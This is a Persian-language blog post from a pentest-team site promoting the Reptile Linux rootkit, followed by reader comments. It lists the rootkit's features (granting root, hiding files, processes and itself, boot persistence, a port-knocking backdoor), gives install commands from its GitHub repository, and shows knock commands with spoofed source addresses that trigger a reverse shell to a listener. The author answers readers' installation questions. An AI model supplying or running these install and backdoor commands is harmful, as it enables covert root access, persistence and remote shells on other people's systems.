معرفی Rootkit لینوکسی Reptile

Rootkit چیست ؟

معرفی Rootkit لینوکسی Reptile !!! روت کیت چیست ؟
امروز قصد معرفی یک Rootkit لینوکسی پیشرفته رو برای شما عزیزان دارم !!!
این Rootkit برای اهداف شیطانی و سو استفاده نوشته شده است و روی کرنل های : 2.6x – 3.x – 4.x
پاسخگو است ، و تقریبا میشه گفت جز بهترین روت کیت های پابلیک شده موجود در سطح نت میباشد.
معرفی Rootkit لینوکسی Reptile

Rootkit چیست ؟

با سلام و احترام خدمت تمامی دوستان و اعضای محترم تیم امنیتی PentestCore.Com
در ابتدا بررسی کنیم Rootkit چیست ؟
همانطور که از اسمش پیداست ، نوعی بدافزار است که
با ورود به سیستم تارگت به بالاترین سطح دسترسی یعنی روت ارتقا پیدا میکند
و توانایی تغییر تمامی تنظیمات را داراست ، اغلب صاحب سیستم متوجه حضور آن نمیشود و یافتن آن بسیار سخت و تقریبا غیر ممکن است.

روت کیت لینوکسی Reptile دارای ویژگی های زیر است :

  • Give root to unprivileged users
  • Hide files and directories
  • Hide files contents
  • Hide processes
  • Hide himself
  • Hidden boot persistence
  • Heaven’s door – A ICMP/UDP/TCP port-knocking backdoor
  • Client to knock on heaven’s door 😀

نحوه نصب Rootkit :

  • 1-apt-get install linux-headers-$(uname -r)
    2-git clone https://github.com/f0rb1dd3n/Reptile.git
    3-cd Reptile
  • 4- install installer.sh/.

اطلاعات بصورت باینری داخل پوشه /reptile کپی میشوند که توسط روت کیت این پوشه مخفی شده است .
بدست آوردن اختیارات روت…
معرفی Rootkit لینوکسی Reptile
نحوه استفاده کردن از قابلیت Hide :
معرفی Rootkit لینوکسی Reptile

نحوه استفاده از قابلیت Knocking on heaven’s door :

switch (-x)  Protocol (ICMP/UDP/TCP)
switch (-s)  Source IP address (You can spoof)
switch (-t)  Target IP address
switch (-p)  Source Port
switch (-q)  Target Port
switch (-d)  Data to knock on backdoor: “<key> <reverse IP> <reverse Port>” -l Launch listener
switch (-l)  Launch listener

مثال :

ICMP: ./knock -x icmp -s 192.168.0.2 -t 192.168.0.3 -d “F0rb1dd3n 192.168.0.4 4444” -l

UDP: ./knock -x udp -s 192.168.0.2 -t 192.168.0.3 -p 666 -q 53 -d “F0rb1dd3n 192.168.0.4 4444” -l

TCP: ./knock -x tcp -s 192.168.0.2 -t 192.168.0.3 -p 666 -q 80 -d “F0rb1dd3n 192.168.0.4 4444” -l

معرفی Rootkit لینوکسی Reptile

لینک گیت هاب ابزار :


Reptile Rootkit


امیدوارم که مفید بوده باشه
مسولیت استفاده نادرست به عهده کاربر میباشد…

0/5 (0 نظر)

مطالب مرتبط

۴ دیدگاه در “معرفی Rootkit لینوکسی Reptile”

  • saman فروردین 18, 1399 پاسخ

    سلام ببخشید در اونجا من به جای uname یوزر رو مینویسم نمیشه باید چی بنویسم ؟؟

    • نیما حسینی فروردین 23, 1399 پاسخ

      درود
      نیازی نیست ، دستورات نصب اپدیت شده است، طبق دستورات جدید نصب را انجام دهید.

  • محمد مهر 24, 1399 پاسخ

    سلام ببخشید در نحوه ی نصب فقط چند کد دادید.این هارو کجا باید وارد کنیم تا برنامه نصب بشه؟

    • نیما حسینی آبان 3, 1399 پاسخ

      درود
      برای استفاده باید یک اشنایی کلی داشته باشید از لینوکس این دستورات را باید در ترمینال لینوکس خود وارد کنید.

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *